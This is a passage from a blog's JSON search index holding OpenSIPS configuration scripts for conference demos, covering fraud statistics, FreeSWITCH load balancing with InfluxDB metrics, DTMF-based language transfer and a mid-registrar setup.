\u0026#34;serverA\u0026#34;, $var(ccc)); xlog(\u0026#34;XXX stats: $var(cc) / $var(ccc)\\n\u0026#34;); } timer_route [dump_fraud_seq, 1] { $var(seq) = 0; $var(cseq) = 0; cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_seq\u0026#34;, $var(seq)); cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critseq\u0026#34;, $var(cseq)); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_seq\u0026#34;); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critseq\u0026#34;); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;seq\u0026#34;, \u0026#34;serverA\u0026#34;, $var(seq)); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;critseq\u0026#34;, \u0026#34;serverA\u0026#34;, $var(cseq)); xlog(\u0026#34;XXX stats: $var(seq) / $var(cseq)\\n\u0026#34;); } ","permalink":"https://wdd.js.org/opensips/ch8/fraud/","summary":"# # $Id$ # # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. # ####### Global Parameters ######### log_level=3 log_stderror=yes log_facility=LOG_LOCAL0 children=4 memdump=-1 /* uncomment the following line to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen=udp:127.","title":"opensips-summit-fraud"},{"content":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. # ####### Global Parameters ######### log_level=3 memdump=1 log_stderror=yes log_facility=LOG_LOCAL0 children=10 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen=udp:192.168.56.1:5070 # CUSTOMIZE ME ####### Modules Section ######## #set module path mpath=\u0026#34;modules/\u0026#34; loadmodule \u0026#34;httpd.so\u0026#34; modparam(\u0026#34;httpd\u0026#34;, \u0026#34;port\u0026#34;, 8081) loadmodule \u0026#34;mi_json.so\u0026#34; #### SIGNALING module loadmodule \u0026#34;signaling.so\u0026#34; #### StateLess module loadmodule \u0026#34;sl.so\u0026#34; #### Transaction Module loadmodule \u0026#34;tm.so\u0026#34; modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timeout\u0026#34;, 2) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timeout\u0026#34;, 30) modparam(\u0026#34;tm\u0026#34;, \u0026#34;restart_fr_on_each_reply\u0026#34;, 0) modparam(\u0026#34;tm\u0026#34;, \u0026#34;onreply_avp_mode\u0026#34;, 1) loadmodule \u0026#34;cachedb_local.so\u0026#34; loadmodule \u0026#34;mathops.so\u0026#34; modparam(\u0026#34;mathops\u0026#34;, \u0026#34;decimal_digits\u0026#34;, 12) loadmodule \u0026#34;rest_client.so\u0026#34; #### Record Route Module loadmodule \u0026#34;rr.so\u0026#34; /* do not append from tag to the RR (no need for this script) */ modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) #### MAX ForWarD module loadmodule \u0026#34;maxfwd.so\u0026#34; #### SIP MSG OPerationS module loadmodule \u0026#34;sipmsgops.so\u0026#34; #### FIFO Management Interface loadmodule \u0026#34;mi_fifo.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo_2\u0026#34;) modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_mode\u0026#34;, 0666) #### URI module loadmodule \u0026#34;uri.so\u0026#34; modparam(\u0026#34;uri\u0026#34;, \u0026#34;use_uri_table\u0026#34;, 0) loadmodule \u0026#34;cfgutils.so\u0026#34; #### USeR LOCation module loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;nat_bflag\u0026#34;, \u0026#34;NAT\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) #### REGISTRAR module loadmodule \u0026#34;registrar.so\u0026#34; modparam(\u0026#34;registrar\u0026#34;, \u0026#34;tcp_persistent_flag\u0026#34;, \u0026#34;TCP_PERSISTENT\u0026#34;) /* uncomment the next line not to allow more than 10 contacts per AOR */ #modparam(\u0026#34;registrar\u0026#34;, \u0026#34;max_contacts\u0026#34;, 10) #### ACCounting module loadmodule \u0026#34;acc.so\u0026#34; /* what special events should be accounted ? */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) /* by default we do not adjust the direct of the sequential requests. if you enable this parameter, be sure the enable \u0026#34;append_fromtag\u0026#34; in \u0026#34;rr\u0026#34; module */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) loadmodule \u0026#34;proto_udp.so\u0026#34; loadmodule \u0026#34;dialog.so\u0026#34; loadmodule \u0026#34;statistics.so\u0026#34; loadmodule \u0026#34;load_balancer.so\u0026#34; modparam(\u0026#34;load_balancer\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://opensips:opensipsrw@192.168.56.128/opensips\u0026#34;) modparam(\u0026#34;load_balancer\u0026#34;, \u0026#34;initial_freeswitch_load\u0026#34;, 15) modparam(\u0026#34;load_balancer\u0026#34;, \u0026#34;fetch_freeswitch_stats\u0026#34;, 1) loadmodule \u0026#34;freeswitch.so\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; ####### Routing Logic ######## # main request routing logic startup_route { $stat(neg_replies) = 0; } route { if ($stat(neg_replies) == \u0026#34;\u0026lt;null\u0026gt;\u0026#34;) $stat(neg_replies) = 0; if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; } if (has_totag()) { # handle hop-by-hop ACK (no routing required) if ( is_method(\u0026#34;ACK\u0026#34;) \u0026amp;\u0026amp; t_check_trans() ) { t_relay(); exit; } # sequential request within a dialog should # take the path determined by record-routing if ( !loose_route() ) { # we do record-routing for all our traffic, so we should not # receive any sequential requests without Route hdr. sl_send_reply(\u0026#34;404\u0026#34;,\u0026#34;Not here\u0026#34;); exit; } if (is_method(\u0026#34;BYE\u0026#34;)) { # do accounting even if the transaction fails do_accounting(\u0026#34;log\u0026#34;,\u0026#34;failed\u0026#34;); } # route it out to whatever destination was set by loose_route() # in $du (destination URI). route(relay); exit; } # CANCEL processing if (is_method(\u0026#34;CANCEL\u0026#34;)) { if (t_check_trans()) t_relay(); exit; } t_check_trans(); if ( !(is_method(\u0026#34;REGISTER\u0026#34;) ) ) { if (is_myself(\u0026#34;$fd\u0026#34;)) { } else { # if caller is not local, then called number must be local if (!is_myself(\u0026#34;$rd\u0026#34;)) { send_reply(\u0026#34;403\u0026#34;,\u0026#34;Rely forbidden\u0026#34;); exit; } } } # preloaded route checking if (loose_route()) { xlog(\u0026#34;L_ERR\u0026#34;, \u0026#34;Attempt to route with preloaded Route\u0026#39;s [$fu/$tu/$ru/$ci]\u0026#34;); if (!is_method(\u0026#34;ACK\u0026#34;)) sl_send_reply(\u0026#34;403\u0026#34;,\u0026#34;Preload Route denied\u0026#34;); exit; } # record routing if (!is_method(\u0026#34;REGISTER|MESSAGE\u0026#34;)) record_route(); # account only INVITEs if (is_method(\u0026#34;INVITE\u0026#34;)) { create_dialog(); $dlg_val(start_ts) = $Ts; $dlg_val(start_tsm) = $Tsm; $dlg_val(pdd_pen) = \u0026#34;0\u0026#34;; t_on_reply(\u0026#34;invite_reply\u0026#34;); do_accounting(\u0026#34;log\u0026#34;); } if (!is_myself(\u0026#34;$rd\u0026#34;)) { append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); route(relay); } # requests for my domain if (is_method(\u0026#34;PUBLISH|SUBSCRIBE\u0026#34;)) { sl_send_reply(\u0026#34;501\u0026#34;, \u0026#34;Not Implemented\u0026#34;); exit; } if (is_method(\u0026#34;REGISTER\u0026#34;)) { if (!save(\u0026#34;location\u0026#34;)) sl_reply_error(); exit; } if ($rU==NULL) { # request with no Username in RURI sl_send_reply(\u0026#34;484\u0026#34;,\u0026#34;Address Incomplete\u0026#34;); exit; } if (!load_balance(\u0026#34;2\u0026#34;, \u0026#34;call\u0026#34;)) { xlog(\u0026#34;no available destinations!\\n\u0026#34;); send_reply(\u0026#34;503\u0026#34;, \u0026#34;No available dsts\u0026#34;); exit; } # when routing via usrloc, log the missed calls also do_accounting(\u0026#34;log\u0026#34;,\u0026#34;missed\u0026#34;); route(relay); } onreply_route [invite_reply] { if ($rs == 180) { if ($Ts == $(dlg_val(start_ts){s.int})) { $var(diff_sec) = 0; $var(diff_usec) = $Tsm - $(dlg_val(start_tsm){s.int}); } else if ($Tsm \u0026gt; $(dlg_val(start_tsm){s.int})) { $var(diff_sec) = $Ts - $(dlg_val(start_ts){s.int}); $var(diff_usec) = $Tsm - $(dlg_val(start_tsm){s.int}); } else { $var(diff_sec) = $Ts - $(dlg_val(start_ts){s.int}) - 1; $var(diff_usec) = 1000000 + $Tsm - $(dlg_val(start_tsm){s.int}); } $var(diff_usec) = $var(diff_usec) + $dlg_val(pdd_pen); cache_add(\u0026#34;local\u0026#34;, \u0026#34;tot_sec\u0026#34;, $var(diff_sec), 0, $var(nsv)); cache_add(\u0026#34;local\u0026#34;, \u0026#34;tot_usec\u0026#34;, $var(diff_usec), 0, $var(nmsv)); cache_add(\u0026#34;local\u0026#34;, \u0026#34;tot\u0026#34;, 1, 0); xlog(\u0026#34;XXXX: $var(diff_sec) s, $var(diff_usec) us | $var(nsv) | $var(nmsv)\\n\u0026#34;); } } route[relay] { # for INVITEs enable some additional helper routes if (is_method(\u0026#34;INVITE\u0026#34;)) { t_on_branch(\u0026#34;per_branch_ops\u0026#34;); t_on_failure(\u0026#34;missed_call\u0026#34;); } if (!t_relay()) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Internal Error\u0026#34;); } exit; } branch_route[per_branch_ops] { xlog(\u0026#34;new branch at $ru\\n\u0026#34;); } onreply_route[handle_nat] { xlog(\u0026#34;incoming reply\\n\u0026#34;); } failure_route[missed_call] { if (t_was_cancelled()) { exit; } if (!math_eval(\u0026#34;$dlg_val(pdd_pen) + 10000\u0026#34;, \u0026#34;$dlg_val(pdd_pen)\u0026#34;)) { xlog(\u0026#34;math eval error $rc\\n\u0026#34;); } cache_add(\u0026#34;local\u0026#34;, \u0026#34;neg_replies\u0026#34;, 1, 0); if (t_check_status(\u0026#34;(5|6)[0-9][0-9]\u0026#34;) || (t_check_status(\u0026#34;408\u0026#34;) \u0026amp;\u0026amp; t_local_replied(\u0026#34;all\u0026#34;))) { xlog(\u0026#34;ERROR: FS GW error, status=$rs\\n\u0026#34;); if (!lb_next()) { xlog(\u0026#34;ERROR: all FS are down!\\n\u0026#34;); send_reply(\u0026#34;503\u0026#34;, \u0026#34;No available destination\u0026#34;); exit; } } xlog(\u0026#34;rerouting to $ru / $du\\n\u0026#34;); t_on_reply(\u0026#34;invite_reply\u0026#34;); t_on_failure(\u0026#34;missed_call\u0026#34;); t_relay(); exit; # uncomment the following lines if you want to block client # redirect based on 3xx replies. ##if (t_check_status(\u0026#34;3[0-9][0-9]\u0026#34;)) { ##t_reply(\u0026#34;404\u0026#34;,\u0026#34;Not found\u0026#34;); ##\texit; ##} } timer_route [dump_pdd, 1] { $var(out) = 0; $var(out_us) = 0; $var(tot) = 0; $var(result) = 0; cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;tot_sec\u0026#34;, $var(out)); cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;tot_usec\u0026#34;, $var(out_us)); cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;tot\u0026#34;, $var(tot)); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;tot_sec\u0026#34;); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;tot_usec\u0026#34;); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;tot\u0026#34;); if ($var(tot) \u0026gt; 0) { if (!math_eval(\u0026#34;($var(out) + ($var(out_us) / 1000000)) / $var(tot)\u0026#34;, \u0026#34;$var(result)\u0026#34;)) { xlog(\u0026#34;math eval error $rc\\n\u0026#34;); } route(store_influxdb, \u0026#34;fsdemo\u0026#34;, \u0026#34;pdd\u0026#34;, \u0026#34;serverB\u0026#34;, $var(result)); } } #route [lb_route] #{ #\txlog(\u0026#34;foo: $(avp(lb_loads)[*])\\n\u0026#34;); #\troute(store_influxdb, \u0026#34;fsdemo\u0026#34;, \u0026#34;bal\u0026#34;, \u0026#34;serverA\u0026#34;, $(avp(lb_loads)[0])); #\tif ($(avp(lb_loads)[1]) != NULL) { #\troute(store_influxdb, \u0026#34;fsdemo\u0026#34;, \u0026#34;bal\u0026#34;, \u0026#34;serverB\u0026#34;, $(avp(lb_loads)[1])); #\t} #} route [store_influxdb] { $var(body) = $param(2) + \u0026#34;,host=\u0026#34; + $param(3) + \u0026#34; value=\u0026#34; + $param(4); xlog(\u0026#34;XXX posting: $var(body) ($param(1) / $param(2) / $param(4))\\n\u0026#34;); if (!rest_post(\u0026#34;http://localhost:8086/write?db=$param(1)\u0026#34;, \u0026#34;$var(body)\u0026#34;, , \u0026#34;$var(body)\u0026#34;)) { xlog(\u0026#34;ERR in rest_post!\\n\u0026#34;); exit; } } timer_route [dump_reply_stats, 1] { $var(nr) = 0; cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;neg_replies\u0026#34;, $var(nr)); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;neg_replies\u0026#34;); route(store_influxdb, \u0026#34;fsdemo\u0026#34;, \u0026#34;neg\u0026#34;, \u0026#34;serverB\u0026#34;, $var(nr)); route(store_influxdb, \u0026#34;fsdemo\u0026#34;, \u0026#34;rpl\u0026#34;, \u0026#34;serverB\u0026#34;, $stat(rcv_replies)); xlog(\u0026#34;XXX stats: $var(nr)\\n\u0026#34;); } ","permalink":"https://wdd.js.org/opensips/ch8/fs-loadbalance/","summary":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. # ####### Global Parameters ######### log_level=3 memdump=1 log_stderror=yes log_facility=LOG_LOCAL0 children=10 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen=udp:192.","title":"cluecon-fslb"},{"content":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. # ####### Global Parameters ######### log_level=4 log_stderror=no log_facility=LOG_LOCAL0 children=4 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen = udp:10.0.0.10:5060 ####### Modules Section ######## #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; #### SIGNALING module loadmodule \u0026#34;signaling.so\u0026#34; #### StateLess module loadmodule \u0026#34;sl.so\u0026#34; #### Transaction Module loadmodule \u0026#34;tm.so\u0026#34; modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timeout\u0026#34;, 5) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timeout\u0026#34;, 30) modparam(\u0026#34;tm\u0026#34;, \u0026#34;restart_fr_on_each_reply\u0026#34;, 0) modparam(\u0026#34;tm\u0026#34;, \u0026#34;onreply_avp_mode\u0026#34;, 1) #### Record Route Module loadmodule \u0026#34;rr.so\u0026#34; /* do not append from tag to the RR (no need for this script) */ modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) #### MAX ForWarD module loadmodule \u0026#34;maxfwd.so\u0026#34; #### SIP MSG OPerationS module loadmodule \u0026#34;sipmsgops.so\u0026#34; #### FIFO Management Interface loadmodule \u0026#34;mi_fifo.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_mode\u0026#34;, 0666) #### URI module loadmodule \u0026#34;uri.so\u0026#34; modparam(\u0026#34;uri\u0026#34;, \u0026#34;use_uri_table\u0026#34;, 0) #### USeR LOCation module loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;nat_bflag\u0026#34;, \u0026#34;NAT\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) #### REGISTRAR module loadmodule \u0026#34;registrar.so\u0026#34; modparam(\u0026#34;registrar\u0026#34;, \u0026#34;tcp_persistent_flag\u0026#34;, \u0026#34;TCP_PERSISTENT\u0026#34;) /* uncomment the next line not to allow more than 10 contacts per AOR */ #modparam(\u0026#34;registrar\u0026#34;, \u0026#34;max_contacts\u0026#34;, 10) #### ACCounting module loadmodule \u0026#34;acc.so\u0026#34; /* what special events should be accounted ? */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) /* by default we do not adjust the direct of the sequential requests. if you enable this parameter, be sure the enable \u0026#34;append_fromtag\u0026#34; in \u0026#34;rr\u0026#34; module */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) loadmodule \u0026#34;cachedb_local.so\u0026#34; loadmodule \u0026#34;freeswitch.so\u0026#34; loadmodule \u0026#34;freeswitch_scripting.so\u0026#34; modparam(\u0026#34;freeswitch_scripting\u0026#34;, \u0026#34;fs_subscribe\u0026#34;, \u0026#34;fs://:ClueCon@10.0.0.246:8021/database?DTMF,CHANNEL_STATE,CHANNEL_ANSWER,HEARTBEAT\u0026#34;) loadmodule \u0026#34;db_mysql.so\u0026#34; loadmodule \u0026#34;cfgutils.so\u0026#34; loadmodule \u0026#34;drouting.so\u0026#34; modparam(\u0026#34;drouting\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://root:liviusmysqlpassword@localhost/opensips\u0026#34;) loadmodule \u0026#34;event_route.so\u0026#34; loadmodule \u0026#34;json.so\u0026#34; loadmodule \u0026#34;proto_udp.so\u0026#34; ####### Routing Logic ######## # main request routing logic # $param(1) - 1 if the R-URI IP:port should be rewritten route [goes_to_support] { if ($param(1) == 1) $var(flags) = \u0026#34;\u0026#34;; else $var(flags) = \u0026#34;C\u0026#34;; if (do_routing(\u0026#34;0\u0026#34;, \u0026#34;$var(flags)\u0026#34;)) return(1); return(-1); } route [FREESWITCH_XFER_BY_DTMF_LANG] { # this call has already been transferred if (cache_fetch(\u0026#34;local\u0026#34;, \u0026#34;DTMF-$json(body/Unique-ID)\u0026#34;, $var(_))) return; switch ($json(body/DTMF-Digit)) { case \u0026#34;1\u0026#34;: xlog(\u0026#34;transferring to English support line\\n\u0026#34;); freeswitch_esl(\u0026#34;bgapi uuid_transfer $json(body/Unique-ID) -aleg 1001\u0026#34;, \u0026#34;$var(fs_box)\u0026#34;, \u0026#34;$var(output)\u0026#34;); break; case \u0026#34;2\u0026#34;: xlog(\u0026#34;transferring to Spanish support line\\n\u0026#34;); freeswitch_esl(\u0026#34;bgapi uuid_transfer $json(body/Unique-ID) -aleg 1002\u0026#34;, \u0026#34;$var(fs_box)\u0026#34;, \u0026#34;$var(output)\u0026#34;); break; default: xlog(\u0026#34;DEFAULT: transferring to English support line\\n\u0026#34;); freeswitch_esl(\u0026#34;bgapi uuid_transfer $json(body/Unique-ID) -aleg 1001\u0026#34;, \u0026#34;$var(fs_box)\u0026#34;, \u0026#34;$var(output)\u0026#34;); } xlog(\u0026#34;ran FS uuid_transfer, output: $var(output)\\n\u0026#34;); cache_store(\u0026#34;local\u0026#34;, \u0026#34;DTMF-$json(body/Unique-ID)\u0026#34;, \u0026#34;OK\u0026#34;, 600); } event_route [E_FREESWITCH] { fetch_event_params(\u0026#34;$var(event_name);$var(fs_box);$var(event_body)\u0026#34;); xlog(\u0026#34;FreeSWITCH event $var(event_name) from $var(fs_box), with $var(event_body)\\n\u0026#34;); $json(body) := $var(event_body); if ($var(event_name) == \u0026#34;DTMF\u0026#34;) { $rU = $json(body/Caller-Destination-Number); if (!$rU) { xlog(\u0026#34;SCRIPT:DTMF:ERR: missing body/Caller-Destination-Number field!\\n\u0026#34;); return; } if (route(goes_to_support, 0)) route(FREESWITCH_XFER_BY_DTMF_LANG); } } route { if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; } if (has_totag()) { # handle hop-by-hop ACK (no routing required) if ( is_method(\u0026#34;ACK\u0026#34;) \u0026amp;\u0026amp; t_check_trans() ) { t_relay(); exit; } # sequential request within a dialog should # take the path determined by record-routing if ( !loose_route() ) { # we do record-routing for all our traffic, so we should not # receive any sequential requests without Route hdr. sl_send_reply(\u0026#34;404\u0026#34;,\u0026#34;Not here\u0026#34;); exit; } if (is_method(\u0026#34;BYE\u0026#34;)) { # do accounting even if the transaction fails do_accounting(\u0026#34;log\u0026#34;,\u0026#34;failed\u0026#34;); } # route it out to whatever destination was set by loose_route() # in $du (destination URI). route(relay); exit; } # CANCEL processing if (is_method(\u0026#34;CANCEL\u0026#34;)) { if (t_check_trans()) t_relay(); exit; } t_check_trans(); if ( !(is_method(\u0026#34;REGISTER\u0026#34;) ) ) { if (is_myself(\u0026#34;$fd\u0026#34;)) { } else { # if caller is not local, then called number must be local if (!is_myself(\u0026#34;$rd\u0026#34;)) { send_reply(\u0026#34;403\u0026#34;,\u0026#34;Rely forbidden\u0026#34;); exit; } } } # preloaded route checking if (loose_route()) { xlog(\u0026#34;L_ERR\u0026#34;, \u0026#34;Attempt to route with preloaded Route\u0026#39;s [$fu/$tu/$ru/$ci]\u0026#34;); if (!is_method(\u0026#34;ACK\u0026#34;)) sl_send_reply(\u0026#34;403\u0026#34;,\u0026#34;Preload Route denied\u0026#34;); exit; } # record routing if (!is_method(\u0026#34;REGISTER|MESSAGE\u0026#34;)) record_route(); # requests for my domain if (is_method(\u0026#34;PUBLISH|SUBSCRIBE\u0026#34;)) { sl_send_reply(\u0026#34;503\u0026#34;, \u0026#34;Service Unavailable\u0026#34;); exit; } if (is_method(\u0026#34;REGISTER\u0026#34;)) { if (!save(\u0026#34;location\u0026#34;)) sl_reply_error(); exit; } if (!is_method(\u0026#34;INVITE\u0026#34;)) { sl_send_reply(\u0026#34;405\u0026#34;, \u0026#34;Method Not Allowed\u0026#34;); exit; } do_accounting(\u0026#34;log\u0026#34;); if (!is_myself(\u0026#34;$rd\u0026#34;)) { append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); route(relay); } if ($rU==NULL) { # request with no Username in RURI sl_send_reply(\u0026#34;484\u0026#34;,\u0026#34;Address Incomplete\u0026#34;); exit; } # do lookup with method filtering if (!lookup(\u0026#34;location\u0026#34;,\u0026#34;m\u0026#34;)) { t_reply(\u0026#34;404\u0026#34;, \u0026#34;Not Found\u0026#34;); exit; } # when routing via usrloc, log the missed calls also do_accounting(\u0026#34;log\u0026#34;,\u0026#34;missed\u0026#34;); route(relay); } route[relay] { # for INVITEs enable some additional helper routes if (is_method(\u0026#34;INVITE\u0026#34;)) { t_on_branch(\u0026#34;per_branch_ops\u0026#34;); t_on_reply(\u0026#34;handle_nat\u0026#34;); t_on_failure(\u0026#34;missed_call\u0026#34;); } if (!t_relay()) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Internal Error\u0026#34;); }; exit; } branch_route[per_branch_ops] { xlog(\u0026#34;new branch at $ru\\n\u0026#34;); } onreply_route[handle_nat] { xlog(\u0026#34;incoming reply\\n\u0026#34;); } failure_route[missed_call] { if (t_was_cancelled()) { exit; } # uncomment the following lines if you want to block client # redirect based on 3xx replies. ##if (t_check_status(\u0026#34;3[0-9][0-9]\u0026#34;)) { ##t_reply(\u0026#34;404\u0026#34;,\u0026#34;Not found\u0026#34;); ##\texit; ##} } ","permalink":"https://wdd.js.org/opensips/ch8/dtmf-lan/","summary":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. # ####### Global Parameters ######### log_level=4 log_stderror=no log_facility=LOG_LOCAL0 children=4 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen = udp:10.","title":"freeswitch-dtmf-language"},{"content":"# # $Id$ # # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. # ####### Global Parameters ######### log_level=4 log_stderror=yes log_facility=LOG_LOCAL0 children=4 /* uncomment the following line to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen=udp:10.0.0.3:5060 # CUSTOMIZE ME ####### Modules Section ######## #set module path mpath=\u0026#34;/usr/local/lib/opensips/modules/\u0026#34; loadmodule \u0026#34;mid_registrar.so\u0026#34; modparam(\u0026#34;mid_registrar\u0026#34;, \u0026#34;mode\u0026#34;, 2) /* 0 = mirror / 1 = ct / 2 = AoR */ modparam(\u0026#34;mid_registrar\u0026#34;, \u0026#34;outgoing_expires\u0026#34;, 7200) modparam(\u0026#34;mid_registrar\u0026#34;, \u0026#34;insertion_mode\u0026#34;, 0) /* 0 = contact; 1 = path */ #### SIGNALING module loadmodule \u0026#34;signaling.so\u0026#34; #### StateLess module loadmodule \u0026#34;sl.so\u0026#34; #### Transaction Module loadmodule \u0026#34;tm.so\u0026#34; modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timeout\u0026#34;, 5) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timeout\u0026#34;, 30) modparam(\u0026#34;tm\u0026#34;, \u0026#34;restart_fr_on_each_reply\u0026#34;, 0) modparam(\u0026#34;tm\u0026#34;, \u0026#34;onreply_avp_mode\u0026#34;, 1) #### Record Route Module loadmodule \u0026#34;rr.so\u0026#34; /* do not append from tag to the RR (no need for this script) */ modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) #### MAX ForWarD module loadmodule \u0026#34;maxfwd.so\u0026#34; #### SIP MSG OPerationS module loadmodule \u0026#34;sipmsgops.so\u0026#34; #### FIFO Management Interface loadmodule \u0026#34;mi_fifo.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) 